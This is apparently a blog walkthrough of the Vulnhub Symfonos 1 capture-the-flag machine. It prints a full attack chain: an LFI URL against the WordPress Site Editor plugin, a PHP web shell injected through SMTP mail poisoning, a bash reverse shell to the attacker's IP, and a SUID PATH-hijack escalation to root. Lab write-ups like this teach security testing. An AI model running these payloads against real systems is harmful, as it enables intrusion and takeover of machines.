Hackatua - April 16, 2023Symfonos 1
Walkthrough of the Symfonos 1 machine from Vulnhub
Getting the target machine's IP address
The first thing we are going to do is try to find out what is the target machine IP. To do this we will use nmap indicating that we want to do a ping scan (-sn) for the entire network we are currently in. If we are not logged in as a root user it is recommended to use sudo to obtain additional information about the computers on the network:
nmap -sn 192.168.56.1/24
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:10 CEST Nmap scan report for 192.168.56.1 Host is up (0.00036s latency). Nmap scan report for 192.168.56.13 Host is up (0.000056s latency). Nmap scan report for 192.168.56.14 Host is up (0.00041s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 3.44 seconds
Nmap indicates that the IP of the target machine is the following (since the first is the IP of the router and the second is the IP of the attacking machine):
192.168.56.14
In case it is a virtual machine we can verify it by checking if the MAC addresses of the network cards match.
The next thing we are going to do is to add the IP of the target machine to our /etc/hosts. This way we won't need to remember the IP and we can use whatever name we give it. We edit the /etc/hosts file and add the following line at the end of it:
192.168.56.14 symfonos1.ctf
Now if we run ping symfonos1.ctf -c 1 we should get the following response:
PING symfonos1.ctf (192.168.56.14) 56(84) bytes of data. 64 bytes from symfonos1.ctf (192.168.56.14): icmp_seq=1 ttl=64 time=0.703 ms --- symfonos1.ctf ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.703/0.703/0.703/0.000 ms
This confirms that it correctly resolves the hostname we have assigned to it.
Port scanning
Once we have the IP of the target machine, what we are going to do is to try to detect the opened ports. To do this we are going to run another nmap scan against the entire port range (-p-) using the fastest timing template (-T5), filtering by the open ports (--open), and disabling DNS resolution (-n) and host discovery (-Pn):
nmap -p- -T5 --open -Pn -n symfonos1.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:14 CEST Nmap scan report for symfonos1.ctf (192.168.56.14) Host is up (0.00021s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 2.08 second
From this scan we obtain that the following ports are open: 22 (SSH), 25 (SMTP), 80 (HTTP), 139 (NETBIOS-SSN) and 445 (MICROSOFT-DS). Knowing that these ports are open, the next thing we are going to do is to try to detect which services are being exposed and their versions (-sCV):
nmap -p 22,25,80,139,445 -sCV symfonos1.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 10:16 CEST Nmap scan report for symfonos1.ctf (192.168.56.14) Host is up (0.00041s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 ab5b45a70547a50445ca6f18bd1803c2 (RSA) | 256 a05f400a0a1f68353ef45407619fc64a (ECDSA) |_ 256 bc31f540bc08584bfb6617ff8412ac1d (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 | ssl-cert: Subject: commonName=symfonos | Subject Alternative Name: DNS:symfonos | Not valid before: 2019-06-29T00:29:42 |_Not valid after: 2029-06-26T00:29:42 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) |_clock-skew: mean: 3h39m58s, deviation: 2h53m12s, median: 1h59m58s | smb2-security-mode: | 311: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-04-16T10:17:09 |_ start_date: N/A | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: symfonos | NetBIOS computer name: SYMFONOS\x00 | Domain name: \x00 | FQDN: symfonos |_ System time: 2023-04-16T05:17:09-05:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
From the result of the more detailed scan we obtain the following:
22/tcp: SSH - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)25/tcp: SMTP - Postfix smtpd80/tcp: HTTP - Apache httpd 2.4.25 ((Debian))139/tcp: NETBIOS-SSN - Samba smbd 3.X - 4.X445/tcp: NETBIOS-SSN - Samba smbd 4.5.16-Debian
SAMBA service enumeration (445/SMB)
In the port scan we have seen that the SMB service which is used for file sharing is exposed. In many occasions no authentication is needed to access those shared files, so we are going to use smbclient to try to list (-L) the shared resources:
smbclient -L //symfonos1.ctf
Result (pressing enter without entering a password):
Password for [WORKGROUP\parrot]: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers helios Disk Helios personal share anonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian) SMB1 disabled -- no workgroup available
The result indicates that we have 2 resources that can be interesting, helios and anonymous. The next thing we are going to do is to try to connect to those resources as a guest (-U guest) to try to access them:
smbclient //symfonos1.ctf/anonymous -U guest
Result (pressing enter without entering a password):
Try "help" to get a list of possible commands. smb: \>
Now that we are connected we list the content with the ls command:
smb: \> ls . D 0 Sat Jun 29 03:14:49 2019 .. D 0 Sat Jun 29 03:12:15 2019 attention.txt N 154 Sat Jun 29 03:14:49 2019 19994224 blocks of size 1024. 17305692 blocks available
It tells us that there is a file called attention.txt. We download it to our machine by running get attention.txt and we see the content:
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! Next person I find using one of these passwords will be fired! -Zeus
In the file it tells us that there are several common passwords used by the system users, which are epidioko, qwerty and baseball.
Now that we have some passwords we are going to try to get possible usernames to be able to log in and access their resources. To do this we are going to use the rpcclient tool indicating that we want to use the anonymous user (-U ""):
rpcclient -U "" symfonos1.ctf
Once we are connected we use the enumdomusers command:
rpcclient $> enumdomusers user:[helios] rid:[0x3e8]
In this way we obtain that there is a user in the system whose name is helios, which matches in name with one of the resources we listed using smbclient. We try to log in using the different passwords we obtained earlier:
smbclient //symfonos1.ctf/helios -U helios
Result (using the password qwerty):
Try "help" to get a list of possible commands. smb: \>
Now that we are logged in we list the available resources with the ls command:
smb: \> ls . D 0 Sat Jun 29 02:32:05 2019 .. D 0 Sat Jun 29 02:37:04 2019 research.txt A 432 Sat Jun 29 02:32:05 2019 todo.txt A 52 Sat Jun 29 02:32:05 2019 19994224 blocks of size 1024. 17305680 blocks available
The result indicates that we have 2 shared files research.txt and all.txt so, as we have done before, we download them using the command get <filename_file>:
Contents of research.txt:
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
Contents of todo.txt:
1. Binge watch Dexter 2. Dance 3. Work on /h3l105
From the 2 files the only interesting clue we get, at least a priori, is that there is a path in the application that is /h3l105.
HTTP service analysis (80/TCP)
If we access the URL http://symfonos.ctf/ using the browser we find only an image. If we inspect the source code we don't see anything else either, so let's see what we find in the other URL we found earlier.
We access http://symfonos.ctf/h3l105/ and we find a page generated using WordPress. To search for possible vulnerabilities in a page created with WordPress there is the tool called WPScan. We indicate that we want to do an aggressive scan of installed plugins:
wpscan --url http://symfonos1.ctf/h3l105/ --enumerate ap --plugins-detection aggressive --plugins-version-detection aggressive
Relevant result:
... Interesting Finding(s): ... [+] Upload directory has listing enabled: http://symfonos1.ctf/h3l105/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% ... [+] Enumerating All Plugins (via Aggressive Methods) Checking Known Locations - Time: 00:00:59 <========================================================================================================> (102916 / 102916) 100.00% Time: 00:00:59 [+] Checking Plugin Versions (via Aggressive Methods) [i] Plugin(s) Identified: ... [+] site-editor | Location: http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/ | Latest Version: 1.1.1 (up to date) | Last Updated: 2017-05-02T23:34:00.000Z | Readme: http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/readme.txt | | Found By: Known Locations (Aggressive Detection) | - http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/, status: 200 | | Version: 1.1.1 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/readme.txt ...
On the one hand we see that we have directory listing capability in /h3l105/wp-content/uploads/. There is a folder siteeditor that, along with the rest of the result of the execution of WPScan confirms that the plugin site-editor with version 1.1.1 is installed. If we look in Exploit Database we find that it has a vulnerability that leads to local file inclusion (LFI) (CVE-2018-7422).
If we read the vulnerability notes, it tells us that we can access system files using the URL http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=<file>, so we try accessing the following URL in the browser:
http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Result:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false Debian-exim:x:105:109::/var/spool/exim4:/bin/false messagebus:x:106:111::/var/run/dbus:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin helios:x:1000:1000:,,,:/home/helios:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false {"success":true,"data":{"output":[]}}
In this way we confirm that the LFI is happening and that we can interpret system files using PHP. If we could find a way to write PHP code on the system and interpret it through the LFI we could derive it in a remote command execution (RCE).
Gaining access to the target machine
Recalling the services we had exposed, among them was the SMTP messaging service. If we try to access in the browser to http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios we check that we have access to that file through the LFI so if we manage to add a message with our PHP shell inside that file we will get RCE.
We connect with Telnet to the target machine and add a message whose concept is <?php system($_GET['c']); ?>:
telnet symfonos1.ctf 25 Trying 192.168.56.14... Connected to symfonos1.ctf. Escape character is '^]'. 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) mail from: test@test.test 250 2.1.0 Ok rcpt to: helios@symfonos.localdomain 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> subject: <?php system($_GET['c']); ?> . 250 2.0.0 Ok: queued as BE46640B98 quit 221 2.0.0 Bye Connection closed by foreign host.
Once we have injected the PHP shell we add the command to execute adding &c=id to the url. If we try to access the URL http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id through the browser we get the following:
... From test@test.test Sun Apr 16 07:42:30 2023 Return-Path: <test@test.test> X-Original-To: helios@symfonos.localdomain Delivered-To: helios@symfonos.localdomain Received: from unknown (unknown [192.168.56.13]) by symfonos.localdomain (Postfix) with SMTP id BE46640B98 for <helios@symfonos.localdomain>; Sun, 16 Apr 2023 07:40:52 -0500 (CDT) subject: uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) {"success":true,"data":{"output":[]}}
As we can see, we have executed the id command on the target machine and we can see the result of its execution. Now we are going to try to create a reverse shell to be able to manage more comfortably.
To do this, we listen in on our machine using Netcat:
nc -nlvp 8888
Receiving the confirmation message that we are listening:
listening on [any] 8888 ...
Then, through the shell that we have uploaded to the server we execute a command to establish a connection to our Netcat (/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.102/8888 0>&1'). To do this we do a url encode of the character '&' and pass it through the c parameter of the url http://symfonos1.ctf/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=/bin/bash -c 'bash -i >%26 /dev/tcp/192.168.56.13/8888 0>%261' obtaining the following result:
connect to [192.168.56.13] from (UNKNOWN) [192.168.56.14] 39122 bash: cannot set terminal process group (492): Inappropriate ioctl for device bash: no job control in this shell <ite-editor/editor/extensions/pagebuilder/includes$
Now, in order to have a fully interactive shell, we launch a pseudo console with script /dev/null -c bash, press Ctrl + z and do a tty treatment with stty raw -echo; fg. We run reset to restart the terminal configuration, type xterm as terminal type and export 2 environment variables:
export TERM=xtermexport SHELL=bash
With this we should be able to do Ctrl + c to end the execution of a command, or Ctrl + l to clear the terminal. We can also go back in the command history.
Privilege escalation
If we check if we have sudoer permissions with sudo -l we see that we don't have any, so let's try to look for executables with SUID privileges. To find them we use the find command:
find / -perm -4000 2>/dev/null
Result:
/usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping
Among the binaries we find one that catches our attention, which is /opt/opt/statuscheck/. If we run it we see that it returns what appears to be an HTTP response from curl:
HTTP/1.1 200 OK Date: Sun, 16 Apr 2023 13:11:32 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT ETag: "148-58c6b9bb3bc5b" Accept-Ranges: bytes Content-Length: 328 Vary: Accept-Encoding Content-Type: text/html
If we try to see the strings contained in the script with strings /opt/statuscheck we see that the script executes the command curl -I H http...:
/lib64/ld-linux-x86-64.so.2 libc.so.6 system __cxa_finalize __libc_start_main _ITM_deregisterTMCloneTable __gmon_start__ _Jv_RegisterClasses _ITM_registerTMCloneTable GLIBC_2.2.5 curl -I H http://lH ocalhostH AWAVA AUATL ...
In this way we verify that it makes use of curl and that it does not define the complete path of the binary, so it could be vulnerable to path hijacking. To check if it is vulnerable we create the file /tmp/curl with the following content:
chmod u+s /bin/bash
What the script will try to do is to give SUID privileges to the /bin/bash binary. After creating the file we give it execution permissions with chmod +x curl and modify the PATH so that it first resolves the fake curl that we have created in /tmp/curl. To achieve this we execute:
export PATH=/tmp:$PATH
If we now check the path by running echo $PATH we see that the first one is /tmp. Then if we run /opt/statuscheck we will see that there is no output anymore and, if we check the bash of the system with ls -l /bin/bash, we see the following:
-rwsr-xr-x 1 root root 1099016 May 15 2017 /bin/bash
In this way we verify that the permissions have been changed and now we can run a bash with privileges (-p) as follows:
bash -p
Result:
bash-4.4# id uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(aud io),30(dip),44(video),46(plugdev),108(netdev)
With this we would be logged in as root and we could access to all the system files.
Once we have gained access as root we can see the flag (
/root/proof.txt):Congrats on rooting symphones:1! ....